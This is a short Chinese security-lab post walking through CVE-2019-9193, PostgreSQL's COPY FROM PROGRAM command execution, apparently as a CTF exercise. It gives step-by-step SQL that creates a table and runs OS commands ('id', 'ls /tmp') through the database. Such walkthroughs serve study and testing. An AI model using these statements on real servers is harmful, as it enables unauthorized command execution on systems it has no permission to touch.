CVE-2019-9193
漏洞描述:从9.3版本开始,Postgres新增了一个COPY TO/FROM PROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令
影响版本:9.3 <= 11.2
参考资料:
- https://cloud.tencent.com/developer/article/1472565
- https://www.freebuf.com/vuls/261361.html
漏洞复现
- 执行删除你想要来保存命令输出但是可能存在的表,这一步可有可无
DROP TABLE IF EXISTS cmd_exec
![图片[1]-【初级】PostgreSQL 高权限命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd120940.png)
CREATE TABLE cmd_exec(cmd_output text);![图片[2]-【初级】PostgreSQL 高权限命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd121007.png)
3.通过 COPY FROM PROGRAM执行系统命令,COPY cmd_exec FROM PROGRAM 'id'
![图片[3]-【初级】PostgreSQL 高权限命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd121028.png)
![图片[4]-【初级】PostgreSQL 高权限命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd121039.png)
- 获取flag
COPY cmd_exec FROM PROGRAM 'ls /tmp';
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
![表情[chi]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/chi.gif)
![表情[xiaojiujie]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/xiaojiujie.gif)
![表情[weiqu]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/weiqu.gif)
![表情[qinqin]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/qinqin.gif)
![表情[leiben]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/leiben.gif)
![表情[baiyan]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/baiyan.gif)
请登录后查看评论内容